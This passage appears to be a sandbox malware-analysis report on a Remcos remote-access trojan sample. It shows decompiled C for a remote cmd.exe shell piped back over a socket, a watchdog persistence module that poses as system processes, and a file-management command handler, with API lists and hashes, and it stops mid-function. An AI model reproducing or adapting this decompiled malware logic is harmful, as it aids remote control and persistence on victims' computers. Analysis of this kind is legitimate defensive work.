                    • Instruction ID: f1c392dd827dd7386799fb200fb30366daf9a0dc8118a507330e02bf81cd2882
                    • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                    • Instruction Fuzzy Hash: 2AB092364542007BCA016600AD86B6EB7526BA0710F14C82ABA98280E0E6B7426AA687
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0040567A Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 278pipesleepfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E0040567A() {
				char _v4;
				void* _v16;
				char _v28;
				char _v52;
				long _v56;
				long _v60;
				CHAR* _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				CHAR* _v84;
				long _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				CHAR* _t97;
				void* _t105;
				intOrPtr _t135;
				signed int _t138;
				signed int _t139;
				long _t141;
				char* _t143;
				void* _t149;
				void* _t155;
				void* _t161;
				void* _t168;

				_t149 =  &_v68;
				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
				_t139 = _t138 | 0xffffffff;
				_t97 = 0;
				if( *0x474c10 >  *((intOrPtr*)(_t135 + 4))) {
					E00432CF1(0x474c10);
					_t152 =  *0x474c10 - _t139;
					if( *0x474c10 == _t139) {
						E004046D7(0x474b70, 0x474c10, 0);
						E0043307B(_t152, E00456897);
						E00432CB2(_t139, 0x474c10);
					}
				}
				if( *0x474bf0 >  *((intOrPtr*)(_t135 + 4))) {
					E00432CF1(0x474bf0);
					_t154 =  *0x474bf0 - _t139;
					if( *0x474bf0 == _t139) {
						E004020BF(_t97, 0x474c18);
						E0043307B(_t154, E0045688D);
						E00432CB2(_t139, 0x474bf0);
					}
				}
				_t98 =  &_v52;
				E004020BF(_t97,  &_v52);
				_t143 = 0x472f78;
				_t136 = CloseHandle;
				_v64 = _t97;
				_t155 =  *0x470ae6 - _t97; // 0x0
				if(_t155 != 0) {
					L12:
					_v60 = _t97;
					PeekNamedPipe( *0x474bf8, _t97, _t97, _t97,  &_v60, _t97);
					if(_v60 <= _t97) {
						_t149 = _t149 - 0x18;
						E00402073(_t97, _t149, _t134, _t143, 0x464074);
						_push(0x62);
						_t139 = E00404A81(0x474b70, _t134, __eflags);
						goto L21;
					}
					_push(_v60);
					_t56 = E0043A620(_t98);
					_t144 = _t56;
					ReadFile( *0x474bf8, _t56, _v60,  &_v56, _t97);
					if(_v56 <= _t97) {
						L19:
						L0043A61B(_t144);
						_t143 = 0x472f78;
						goto L21;
					}
					if(_v64 <= _t97) {
						L17:
						E00402073(_t97,  &_v28, _t134, _t144, _t144);
						_t149 = _t149 - 0x18;
						_t105 = _t149;
						_push(_v60);
						_push(_t97);
						L18:
						E00405A8B(_t97, _t105, _t134, _t144, _t165);
						_t139 = E00404A81(0x474b70, _t134, _t165, 0x62,  &_v28);
						E00401FB8();
						goto L19;
					}
					_t66 = E0043A630(_t144, E00401F8B( &_v52), _v64);
					_t149 = _t149 + 0xc;
					_t165 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402073(_t97,  &_v28, _t134, _t144, _t144);
					_t149 = _t149 - 0x18;
					_t105 = _t149;
					_push(_v60 - _v68);
					_push(_v68);
					goto L18;
				} else {
					_t134 = "cmd.exe";
					_t98 = 0x472f78;
					_t70 = E00405AE5("cmd.exe");
					_t156 = _t70;
					if(_t70 == 0) {
						L11:
						_t161 =  *0x470ae6 - _t97; // 0x0
						if(_t161 == 0) {
							L26:
							E00404E06(_t134);
							CloseHandle( *0x474bf8);
							CloseHandle( *0x474c14);
							 *0x470ae6 = _t97;
							_t97 = 1;
							L27:
							E00401FB8();
							E00401FB8();
							return _t97;
						} else {
							goto L12;
						}
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
							_t98 = _t143;
							 *0x470ae7 =  <=  ? 0 :  *0x470ae7 & 0x000000ff;
							if(E0040245C() == 0) {
								_v84 = _t97;
							} else {
								L0040535D(_t97, _t143, _t134, _t136, _t143, "\n");
								E00401FA0( &_v76, _t143);
								_t52 = E0040245C();
								WriteFile( *0x474bf4, E00401F8B(_t143), _t52,  &_v92, _t97);
								_t98 = _t143;
								L00405A86(_t97, _t143, _t134, 0x464074);
							}
							Sleep(0x64);
							_t168 =  *0x470ae7 - _t97; // 0x0
						} while (_t168 != 0);
						TerminateProcess(0x474bfc->hProcess, _t97);
						CloseHandle( *0x474c00);
						CloseHandle( *0x474bfc);
						goto L26;
					}
					L00405A86(_t97, 0x474c18, "cmd.exe", E0043A9AA(_t97, _t156, "SystemDrive"));
					L0040535D(_t97, 0x474c18, "cmd.exe", CloseHandle, 0x474c18, "\\");
					0x474b18->nLength = 0xc;
					 *0x474b20 = 1;
					 *0x474b1c = _t97;
					if(CreatePipe(0x474c0c, 0x474bf4, 0x474b18, _t97) == 0 || CreatePipe(0x474bf8, 0x474c14, 0x474b18, _t97) == 0) {
						goto L27;
					} else {
						_t141 = 0x44;
						E00435760(CloseHandle, 0x474b28, _t97, CreatePipe);
						0x474b28->cb = _t141;
						 *0x474b54 = 0x101;
						 *0x474b58 = 0;
						 *0x474b60 =  *0x474c0c;
						_t79 =  *0x474c14;
						 *0x474b64 = _t79;
						 *0x474b68 = _t79;
						_t80 = E00401F8B(0x474c18);
						_t143 = 0x472f78;
						 *0x470ae6 = CreateProcessA(_t97, E00401F8B(0x472f78), _t97, _t97, 1, _t97, _t97, _t80, 0x474b28, 0x474bfc) != 0;
						L00405A86(_t97, 0x472f78, _t134, 0x464074);
						 *0x470ae7 = 1;
						E0040480D(0x474b70);
						E004048A8(0x474b70, 0x474b70, 0x474b70);
						_t149 = _t149 + 0xc - 0x18;
						E004020D6(_t97, _t149, _t134,  *0x470ae6,  &_v4);
						_push(0x93);
						_t98 = 0x474b70;
						_t139 = E00404A81(0x474b70, _t134,  *0x470ae6);
						Sleep(0x12c);
						goto L11;
					}
				}
			}




































                    0x00405680
                    0x00405687
                    0x00405689
                    0x00405691
                    0x00405699
                    0x004056a1
                    0x004056a7
                    0x004056ad
                    0x004056b5
                    0x004056bf
                    0x004056c6
                    0x004056cb
                    0x004056ad
                    0x004056d7
                    0x004056df
                    0x004056e5
                    0x004056eb
                    0x004056f2
                    0x004056fc
                    0x00405703
                    0x00405708
                    0x004056eb
                    0x00405709
                    0x0040570d
                    0x00405712
                    0x00405717
                    0x0040571d
                    0x00405721
                    0x00405727
                    0x00405889
                    0x0040588e
                    0x0040589c
                    0x004058a6
                    0x00405957
                    0x00405961
                    0x00405966
                    0x00405972
                    0x00000000
                    0x00405972
                    0x004058ac
                    0x004058b0
                    0x004058b7
                    0x004058c9
                    0x004058d3
                    0x00405949
                    0x0040594a
                    0x00405950
                    0x00000000
                    0x00405950
                    0x004058d9
                    0x00405914
                    0x00405919
                    0x0040591e
                    0x00405921
                    0x00405923
                    0x00405927
                    0x00405928
                    0x0040592d
                    0x00405942
                    0x00405944
                    0x00000000
                    0x00405944
                    0x004058ea
                    0x004058ef
                    0x004058f2
                    0x004058f4
                    0x00000000
                    0x00000000
                    0x004058fb
                    0x00405908
                    0x0040590b
                    0x0040590d
                    0x0040590e
                    0x00000000
                    0x0040572d
                    0x0040572d
                    0x00405732
                    0x00405734
                    0x00405739
                    0x0040573b
                    0x0040587d
                    0x0040587d
                    0x00405883
                    0x00405a0d
                    0x00405a12
                    0x00405a1d
                    0x00405a25
                    0x00405a27
                    0x00405a2d
                    0x00405a2f
                    0x00405a33
                    0x00405a3c
                    0x00405a4a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405889
                    0x00000000
                    0x00405974
                    0x0040597f
                    0x00405982
                    0x00405984
                    0x00405990
                    0x004059d8
                    0x00405992
                    0x00405999
                    0x004059a3
                    0x004059b0
                    0x004059c4
                    0x004059cf
                    0x004059d1
                    0x004059d1
                    0x004059de
                    0x004059e4
                    0x004059e4
                    0x004059f7
                    0x00405a03
                    0x00405a0b
                    0x00000000
                    0x00405a0b
                    0x00405754
                    0x00405760
                    0x0040577c
                    0x00405786
                    0x00405790
                    0x0040579a
                    0x00000000
                    0x004057b6
                    0x004057b8
                    0x004057c1
                    0x004057c9
                    0x004057d1
                    0x004057db
                    0x004057f0
                    0x004057f5
                    0x004057fb
                    0x00405800
                    0x00405805
                    0x00405810
                    0x0040582e
                    0x00405835
                    0x0040583f
                    0x00405848
                    0x00405850
                    0x00405855
                    0x0040585f
                    0x00405864
                    0x00405869
                    0x00405875
                    0x00405877
                    0x00000000
                    0x00405877
                    0x0040579a

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056C6
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • __Init_thread_footer.LIBCMT ref: 00405703
                    • CreatePipe.KERNEL32(00474C0C,00474BF4,00474B18,00000000,0046408C,00000000), ref: 00405796
                    • CreatePipe.KERNEL32(00474BF8,00474C14,00474B18,00000000), ref: 004057AC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00474B28,00474BFC), ref: 0040581F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00472F78,00464090,00000062,00464074), ref: 004059C4
                    • Sleep.KERNEL32(00000064,00000062,00464074), ref: 004059DE
                    • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                    • CloseHandle.KERNEL32 ref: 00405A03
                    • CloseHandle.KERNEL32 ref: 00405A0B
                    • CloseHandle.KERNEL32 ref: 00405A1D
                    • CloseHandle.KERNEL32 ref: 00405A25
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: (KG$SystemDrive$cmd.exe$pKG$pKG$pKG$pKG$pKG$x/G$x/G$x/G
                    • API String ID: 2994406822-2676871211
                    • Opcode ID: 8e675c81dd6edeb1989733422e1078b2b669ac3476995aad7f6ef634cbc747fb
                    • Instruction ID: 3b714476e132253386e4612caa6ffda136c57d83f36fbb8ab3cb78f76cc16c3c
                    • Opcode Fuzzy Hash: 8e675c81dd6edeb1989733422e1078b2b669ac3476995aad7f6ef634cbc747fb
                    • Instruction Fuzzy Hash: AD91C371644205EFC700BB65AD52E7F36A8EB84344F01453FF949A72E2DB789C848B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041163A Relevance: 37.0, APIs: 7, Strings: 14, Instructions: 238threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0041163A(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				void* _v84;
				char _v100;
				char _v108;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				long _v144;
				char _v148;
				char _v156;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t41;
				CHAR* _t44;
				void* _t45;
				void* _t51;
				void* _t72;
				intOrPtr _t83;
				void* _t84;
				void* _t92;
				void* _t93;
				void* _t110;
				long _t158;
				int _t184;
				long _t186;
				void* _t187;
				char* _t189;
				void* _t190;
				void* _t192;
				signed int _t193;
				void* _t195;
				void* _t202;

				_t195 = (_t193 & 0xfffffff8) - 0x8c;
				_push(_t187);
				_t41 = GetCurrentProcessId();
				_t178 = E00401F8B(0x473238);
				if(E00412B5F(0x473238, _t42, "WD", _t41) != 0) {
					_t44 = E00401F8B(0x473370);
					_t184 = 0;
					_t45 = OpenMutexA(0x100000, 0, _t44);
					__eflags = _t45;
					if(_t45 == 0) {
						E004020BF(0x473238,  &_v76);
						E00401EE4(0x473220);
						E0041ADFE( &_v76);
						E00401F66(0x473238,  &_v100);
						__eflags = E0041AB12( &_v100);
						if(__eflags != 0) {
							_t51 = E0040415E(0x473238,  &_v124,  &_v76, _t192, L"\\SysWOW64\\");
							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v124, __eflags, L"WinDir"));
							E00401EF3( &_v108, _t53, _t187, E00402F85( &_v36, _t53, _t51));
							E00401EE9();
							E00401EE9();
						} else {
							_t93 = E0040415E(0x473238,  &_v28,  &_v76, _t192, L"\\system32\\");
							_t180 = E0040415E(0x473238,  &_v56,  &_v76, _t192, E0043A99F(0x473238,  &_v28, __eflags, L"WinDir"));
							E00401EF3( &_v108, _t95, _t187, E00402F85( &_v132, _t95, _t93));
							E00401EE9();
							E00401EE9();
						}
						E00401EE9();
						E0040BEC3( &_v136);
						E0040415E(0x473238,  &_v124, _t180, _t192, L"svchost.exe");
						E00411DC0(0x473238,  &_v140, _t192, __eflags,  &_v128);
						E00401EE9();
						E0040415E(0x473238,  &_v132, _t180, _t192, L"rmclient.exe");
						E00411DC0(0x473238,  &_v148, _t192, __eflags,  &_v136);
						E00401EE9();
						E0040415E(0x473238,  &_v140, _t180, _t192, L"fsutil.exe");
						E00411DC0(0x473238,  &_v156, _t192, __eflags,  &_v144);
						E00401EE9();
						_t72 = E004021DA( &_v160);
						__eflags = _t72;
						if(_t72 != 0) {
							while(1) {
								_push(0x470d64);
								_t189 = E00401F8B( &_v76);
								_t83 = E00401EE4(E00401E45( &_v136, _t180, _t192, __eflags, _t184));
								_t180 = _t189;
								_t84 = E00416FDD(_t83, _t189);
								__eflags = _t84;
								if(_t84 != 0) {
									break;
								}
								_t184 = _t184 + 1;
								_t92 = E004021DA( &_v136);
								__eflags = _t184 - _t92;
								if(_t184 < _t92) {
									continue;
								}
								goto L11;
							}
							E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog module activated");
							E00402073(0x473238, _t195, _t180, _t192, "i");
							E0041A04A(0x473238, _t184);
							Sleep(0x7d0);
							_t158 =  *0x470d6c; // 0x0
							goto L15;
						}
						L11:
						E00402073(0x473238, _t195 - 0x18, _t180, _t192, "Watchdog launch failed!");
						E00402073(0x473238, _t195, _t180, _t192, "E");
						E0041A04A(0x473238, _t184);
						CloseHandle( *0x470d74);
						E00406150( &_v144);
						E00401EE9();
						E00401FB8();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t45);
						_t202 = _t195 - 0x18;
						E00402073(0x473238, _t202, _t178, _t192, "Remcos restarted by watchdog!");
						_t203 = _t202 - 0x18;
						E00402073(0x473238, _t202 - 0x18, _t178, _t192, "i");
						E0041A04A(0x473238, 0);
						E00402073(0x473238, _t203 + 0x18, _t178, _t192, "Watchdog module activated");
						E00402073(0x473238, _t203 + 0x18 - 0x18, _t178, _t192, "i");
						E0041A04A(0x473238, 0);
						CreateThread(0, 0, E00411D31, 0, 0, 0);
						_t189 = "WDH";
						_t110 = E00412831(E00401F8B(0x473238), _t189,  &_v160);
						__eflags = _t110;
						if(_t110 == 0) {
							goto L1;
						} else {
							 *0x470d64 = OpenProcess(0x1fffff, 0, _v144);
							E00412C91(E00401F8B(0x473238), __eflags, _t189);
							_t158 = _v144;
							L15:
							L16();
							asm("int3");
							_push(_t189);
							_push(_t184);
							_t186 = _t158;
							L17:
							_t190 = OpenProcess(0x100000, 0, _t186);
							WaitForSingleObject(_t190, 0xffffffff);
							CloseHandle(_t190);
							__eflags =  *0x470d4b;
							if(__eflags != 0) {
								E0041163A(__eflags, 0);
							}
							goto L17;
						}
						L19:
					}
				} else {
					L1:
				}
				return 1;
				goto L19;
			}













































                    0x00411640
                    0x00411647
                    0x00411649
                    0x00411661
                    0x0041166c
                    0x0041167b
                    0x00411681
                    0x00411689
                    0x0041168f
                    0x00411691
                    0x00411720
                    0x0041172a
                    0x00411735
                    0x0041173e
                    0x00411748
                    0x0041174a
                    0x004117ad
                    0x004117c8
                    0x004117dc
                    0x004117e8
                    0x004117f1
                    0x0041174c
                    0x00411758
                    0x00411773
                    0x00411784
                    0x0041178d
                    0x00411796
                    0x0041179b
                    0x004117fa
                    0x00411803
                    0x00411811
                    0x0041181f
                    0x00411828
                    0x00411836
                    0x00411844
                    0x0041184d
                    0x0041185b
                    0x00411869
                    0x00411872
                    0x0041187b
                    0x00411880
                    0x00411882
                    0x00411884
                    0x00411884
                    0x00411897
                    0x004118a0
                    0x004118a5
                    0x004118a9
                    0x004118af
                    0x004118b1
                    0x00000000
                    0x00000000
                    0x004118b7
                    0x004118b8
                    0x004118bd
                    0x004118bf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004118bf
                    0x00411924
                    0x00411933
                    0x00411938
                    0x00411945
                    0x0041194b
                    0x00000000
                    0x0041194b
                    0x004118c1
                    0x004118cb
                    0x004118da
                    0x004118df
                    0x004118ed
                    0x004118f7
                    0x00411900
                    0x00411909
                    0x0041190e
                    0x00411910
                    0x00411697
                    0x00411698
                    0x0041169e
                    0x004116a8
                    0x004116ad
                    0x004116b8
                    0x004116bd
                    0x004116cc
                    0x004116d7
                    0x004116dc
                    0x004116ee
                    0x004116f8
                    0x00411708
                    0x0041170f
                    0x00411711
                    0x00000000
                    0x00411717
                    0x00411966
                    0x00411972
                    0x00411978
                    0x0041197c
                    0x0041197c
                    0x00411981
                    0x00411982
                    0x00411983
                    0x00411984
                    0x00411986
                    0x00411994
                    0x00411999
                    0x004119a0
                    0x004119a6
                    0x004119ad
                    0x004119b1
                    0x004119b1
                    0x00000000
                    0x004119ad
                    0x00000000
                    0x00411711
                    0x0041166e
                    0x0041166e
                    0x00411670
                    0x00411917
                    0x00000000

                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00411649
                      • Part of subcall function 00412B5F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00412B6D
                      • Part of subcall function 00412B5F: RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004,00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000), ref: 00412B88
                      • Part of subcall function 00412B5F: RegCloseKey.ADVAPI32(00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000,00000000), ref: 00412B93
                    • OpenMutexA.KERNEL32 ref: 00411689
                    • CloseHandle.KERNEL32(00000000), ref: 00411698
                    • CreateThread.KERNEL32 ref: 004116EE
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041195D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: 2G$82G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$p3G$rmclient.exe$svchost.exe$Cqt
                    • API String ID: 3018269243-2657394792
                    • Opcode ID: 7d37437b41f715853253f697b476e1f2b9fa8c2a3dfb8a05b2250b664f443c55
                    • Instruction ID: 2a728e4d40dbe9f2dcab1c582d9c47d784adc50530ded27a5339f3dd002cc33c
                    • Opcode Fuzzy Hash: 7d37437b41f715853253f697b476e1f2b9fa8c2a3dfb8a05b2250b664f443c55
                    • Instruction Fuzzy Hash: 1A719E3160430157C204FB62DD9ADAE77A8AF90308F40093FF546621E2EE7C9A49C6AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040730B Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E0040730B(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v268;
				char _v396;
				char _v400;
				char _v416;
				void* _v420;
				char _v424;
				char _v432;
				char _v440;
				char _v444;
				char _v448;
				char _v468;
				char _v476;
				char _v480;
				void* _v488;
				char _v492;
				char _v496;
				char _v504;
				char _v512;
				char _v516;
				char _v520;
				void* _v524;
				char _v528;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				void* _v588;
				void* _v596;
				char _v600;
				char _v612;
				char _v620;
				char _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t166;
				int _t182;
				void* _t186;
				void* _t190;
				void* _t198;
				int _t200;
				int _t210;
				int _t213;
				void* _t229;
				int _t231;
				long _t237;
				int _t240;
				void* _t254;
				signed int _t256;
				void* _t267;
				char* _t269;
				void* _t270;
				void* _t281;
				void* _t297;
				void* _t307;
				void* _t324;
				void* _t325;
				void* _t338;
				void* _t345;
				void* _t349;
				int _t350;
				void* _t354;
				void* _t365;
				signed int _t379;
				void* _t383;
				void* _t388;
				void* _t398;
				int _t465;
				void* _t614;
				void* _t617;
				short* _t640;
				intOrPtr _t650;
				intOrPtr _t651;
				int _t652;
				int _t654;
				int _t656;
				int _t657;
				int _t658;
				int _t659;
				void* _t662;
				void* _t664;
				void* _t666;
				void* _t668;
				void* _t669;
				void* _t670;
				void* _t673;
				void* _t674;
				signed int _t675;
				void* _t678;
				void* _t679;
				void* _t680;
				void* _t683;
				void* _t684;
				void* _t685;
				void* _t686;
				void* _t688;
				void* _t689;
				void* _t690;
				void* _t699;
				void* _t700;
				void* _t718;
				void* _t719;
				void* _t720;
				void* _t722;
				void* _t724;
				void* _t732;
				void* _t733;
				void* _t734;
				void* _t735;
				void* _t736;
				void* _t738;
				signed int _t747;

				_t737 = __eflags;
				_t629 = __edx;
				_push(0);
				_t650 = _a4;
				E004020D6(0,  &_v444, __edx, __eflags, _t650 + 0xc);
				SetEvent( *(_t650 + 0x24));
				_t651 =  *((intOrPtr*)(E00401F8B( &_v448)));
				E00404182( &_v448,  &_v424, 4, 0xffffffff);
				_t678 = (_t675 & 0xfffffff8) - 0x20c;
				E004020D6(0, _t678, _t629, _t737, 0x472ec8);
				_t679 = _t678 - 0x18;
				E004020D6(0, _t679, _t629, _t737,  &_v440);
				E0041A976( &_v576, _t629);
				_t680 = _t679 + 0x30;
				_t738 = _t651 - 0x8d;
				if(_t738 > 0) {
					_t652 = _t651 - 0x8e;
					__eflags = _t652;
					if(_t652 == 0) {
						__eflags = 0;
						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, 0, 0)));
						_t166 = E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1));
						_t629 =  &_v552;
						CreateDirectoryW(E00401EE4(E004087F0( &_v480,  &_v552, _t674, _t166)), 0);
						E00401EE9();
						E0040322F(0x2a);
						E004086D0(0, _t680 - 0x18,  &_v552, __eflags,  &_v556);
						goto L57;
					} else {
						_t654 = _t652 - 3;
						__eflags = _t654;
						if(__eflags == 0) {
							_t182 = StrToIntA(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
							_t629 = E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1));
							E0041B35B(_t182, _t184);
						} else {
							_t656 = _t654 - 0x24;
							__eflags = _t656;
							if(__eflags == 0) {
								 *0x470b18 = 0;
								_t186 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
								_t683 = _t680 - 0x18;
								E004020D6(0, _t683, _t629, __eflags, _t186);
								_t684 = _t683 - 0x18;
								E0040415E(0, _t684, _t629, _t674, 0x46a8f0);
								_t190 = E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0));
								_t685 = _t684 - 0x18;
								E0040415E(0, _t685, _t629, _t674, _t190);
								E00401E45( &_v572, _t629, _t674, __eflags, 1);
								E00407E80(E0041A947(__eflags), _t629, __eflags);
								_t686 = _t685 + 0x48;
								__eflags =  *0x470b18; // 0x0
								if(__eflags == 0) {
									Sleep(0x7d0);
									E004020D6(0, _t686 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 0));
									_push(0xb9);
									goto L54;
								}
							} else {
								_t657 = _t656 - 3;
								__eflags = _t657;
								if(_t657 == 0) {
									 *0x470b18 = 1;
								} else {
									_t658 = _t657 - 0xa;
									__eflags = _t658;
									if(__eflags == 0) {
										_t198 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
										_t688 = _t680 - 0x18;
										E004020D6(0, _t688, _t629, __eflags, _t198);
										_t200 = E00407268(_t674);
										_t689 = _t688 + 0x18;
										__eflags = _t200;
										if(_t200 != 0) {
											E00435760(0x472ec8,  &_v268, 0, 0x104);
											_t690 = _t689 + 0xc;
											 *0x470b20(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)),  &_v268);
											_t210 = E0043A3AC(_t207, E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1)));
											__eflags = _t210;
											if(__eflags == 0) {
												_t691 = _t690 - 0x18;
												goto L50;
											} else {
												_t213 = _t210 - 1;
												__eflags = _t213;
												if(__eflags == 0) {
													E00402073(0,  &_v516, _t629, _t674,  &_v268);
													E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
													E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
													_t629 =  &_v528;
													E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
													_t465 = 0;
													__eflags = 0;
													goto L48;
												} else {
													__eflags = _t213 - 1;
													if(__eflags == 0) {
														E00402073(0,  &_v516, _t629, _t674,  &_v268);
														E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
														E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
														_t629 =  &_v528;
														E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
														_t465 = 1;
														L48:
														E004080F9(_t465, _t629, 0x472ec8);
														E00401FB8();
														DeleteFileA( &_v268);
													}
												}
											}
										}
									} else {
										_t659 = _t658 - 1;
										__eflags = _t659;
										if(__eflags == 0) {
											_t229 = E00401E45( &_v552, _t629, _t674, __eflags, 1);
											_t699 = _t680 - 0x18;
											E004020D6(0, _t699, _t629, __eflags, _t229);
											_t231 = E00407268(_t674);
											_t700 = _t699 + 0x18;
											__eflags = _t231;
											if(__eflags != 0) {
												 *0x470b1c(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
												_t691 = _t700 - 0x14;
												L50:
												E004086D0(0, _t691, _t629, __eflags, 0x472f90);
												E00406EB0();
												goto L27;
											}
										} else {
											_t660 = _t659 - 4;
											__eflags = _t659 - 4;
											if(__eflags == 0) {
												_t237 = E0043A3AC(_t235, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 1)));
												_t240 = SetFileAttributesW(E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, _t660)), _t237);
												__eflags = _t240;
												E0041A951(_t680 - 0x18, _t629);
												_push(0xc7);
												L54:
												E00404A81(0x472fc0, _t629, __eflags);
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(_t738 == 0) {
						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
						E0040415E(0,  &_v528, _t629, _t674, E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1)));
						E00408682( &_v564,  &_v516, 0, E0040869C( &_v556,  &_v528,  &_v528) + 1);
						_t254 = E00401EE4(E00408897( &_v504,  &_v528, _t674,  &_v552));
						_t256 = E0043E1F7(E00401EE4( &_v576), _t254);
						asm("sbb bl, bl");
						E00401EE9();
						_t408 =  ~_t256 + 1;
						__eflags =  ~_t256 + 1;
						if( ~_t256 + 1 == 0) {
							_t629 = E004052FE( &_v468, "Unable to rename file!", _t674, 0x472ec8);
							E00408832(_t408, _t680 - 0x18, _t258, 0x472ec8, _t674, __eflags, "16");
							_push(0x59);
							E00404A81(0x472fc0, _t258, __eflags);
							E00401FB8();
						} else {
							_t629 =  &_v492;
							E004087F0(_t680 - 0x18,  &_v492, _t674, "*");
							E00406EB0();
						}
						E00401EE9();
						E00401EE9();
						goto L58;
					} else {
						_t662 = _t651 - 0x61;
						if(_t662 == 0) {
							_t267 = E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0));
							_t691 = _t680 - 0x18;
							E0040415E(0, _t680 - 0x18, _t629, _t674, _t267);
							_t269 = E00401E45( &_v560, _t629, _t674, __eflags, 2);
							_t270 = E00401E45( &_v564, _t629, _t674, __eflags, 1);
							_t629 = _t269;
							E00419BA2(_t270, _t269);
							L27:
						} else {
							_t664 = _t662 - 0x26;
							if(_t664 == 0) {
								GetLogicalDriveStringsA(0x64,  &_v396);
								E00402097(0,  &_v540, _t629, _t674, __eflags,  &_v396, 0x64);
								__eflags = E004061F0( &_v548, 0x464518, 0, 2) + 1;
								E00401F7D(E004061F0( &_v548, 0x464518, 0, 2) + 1);
								E004020D6(0, _t680 - 0x18, _t629, E004061F0( &_v548, 0x464518, 0, 2) + 1,  &_v564);
								_t281 = E00407121(0,  &_v544, _t629);
								_t629 = E00402F11( &_v496,  &_v568, _t674, 0x472ec8);
								E00402E81(_t680 - 0x18, _t282, _t281);
								_push(0x51);
								E00404A81(0x472fc0, _t282, __eflags);
								E00401FB8();
								E00401FB8();
								goto L25;
							} else {
								_t666 = _t664 - 1;
								if(_t666 == 0) {
